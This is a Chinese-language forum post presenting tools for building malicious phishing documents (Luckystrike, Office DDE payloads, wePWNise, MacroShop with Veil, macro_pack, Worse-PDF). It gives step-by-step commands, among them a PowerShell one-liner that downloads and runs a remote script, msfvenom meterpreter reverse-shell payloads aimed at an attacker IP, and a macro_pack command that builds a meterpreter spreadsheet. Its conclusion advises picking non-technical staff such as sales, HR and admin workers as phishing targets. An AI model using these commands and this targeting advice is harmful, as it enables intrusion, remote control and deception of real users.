安全矩阵

 找回密码
 立即注册
搜索
查看: 2470|回复: 0

制作恶意钓鱼文档的多种工具

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-13 20:21:34 | 显示全部楼层 |阅读模式
原文链接:制作恶意钓鱼文档的多种工具

在突破目标网络时,经常会用到网络钓鱼技术,而制作恶意文档,诱骗用户点击,就能获得用户设备的访问权限,这是获取目标内网权限最为直接的方式,本文介绍几个制作恶意文档的工具。


Luckystrike该工具主要使用 COM 对象来执行嵌入 Office 文档的恶意 Payload。
项目地址:
https://github.com/curi0usJack/luckystrike
使用方法:
1、使用管理员权限,执行下面的命令进行初始化安装:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')

2、前往 luckystrike 的文件夹,执行脚本 luckystrike.ps1 进入主菜单:

3、根据菜单提示,创建一个名为 test 的 PowerShell 脚本:

4、查看我们生成的 payload

接下来就可以创建一个嵌入该 Payload 的恶意文件了。

Office-DDE-Payloads这个工具利用 Office 的 DDE(Dynamic Data Exchange)来执行 Payload。
下载地址:
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
安装好之后,执行 ddeexcel.py 生成 excel 文档,执行 ddeword.py 生成 word 文档:

在目标机器上打开该文档时,弹出下面的提示:

但是并没有看到有计算器弹出,但是查看后台进程发现计算机的进程已经有了。这个工具比较容易设置和使用,但是没有达到想要的效果。

wePWNise这个工具会生成一个 VBA 代码,嵌入 Office 文档或者模版文件中。
下载地址:
https://github.com/mwrlabs/wePWNise

比如使用 Metasploit 的 Paylaod,首先使用 msfvenom 生成一个可以使用的 payload:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT= -f raw -o /payloads/msf86.raw
or
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT= -f raw -a x86_64 -o /payloads/msf64.raw
然后使用 wePWNise 生成 payload 输出到 文件中:
$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

MacroShop下载地址:

https://github.com/khr0x40sh/MacroShop
使用 Veil 创建一个 Payload,安装方式:
  1. apt -y install veil
  2. /usr/share/veil/config/setup.sh --force --silent
  3. or
  4. git clone https://github.com/Veil-Framework/Veil.git
  5. cd Veil/
  6. ./config/setup.sh --force --silent
复制代码
安装好之后,使用下面的命令生成 Payload:
  1. python veil.py
  2. use 1
  3. use <payload of your choice>
  4. Fill in the options to meet your needs.
  5. generate
复制代码

生成的 Payload 存储在:

/var/lib/veil/output/source

使用命令:
./macro_safe.py /var/lib/veil/output/source/test.bat test
最终输出的脚本内容如下:

macro_pack下载地址:
https://github.com/sevagas/macro_pack
安装好之后,使用命令:
python3 test/mp_test.py

使用下面的命令生成文文档:
python3 macro_pack.py -t METERPRETER -G test.xls -p

Worse-PDF生成恶意的 PDF 文档,下载地址:
https://github.com/3gstudent/Worse-PDF
使用方法:
python WorsePDF.py <normal PDF> <serverIP>

总结Office 恶意文档是目前最常见的钓鱼手段,也最容易被人警觉,通过邮件发送恶意文档,很多时候会被翻钓鱼邮件网关识别并拦截,如果不存在 Office 软件漏洞的情况,成功率取决于用户的安全意识,所以针对目标用户的选择非常重要,尽量不要选择企业内部的 IT 人员,选择哪些对电脑不熟悉的业务人员,比如销售、HR、行政等人员。















               

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 02:46 , Processed in 0.013497 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表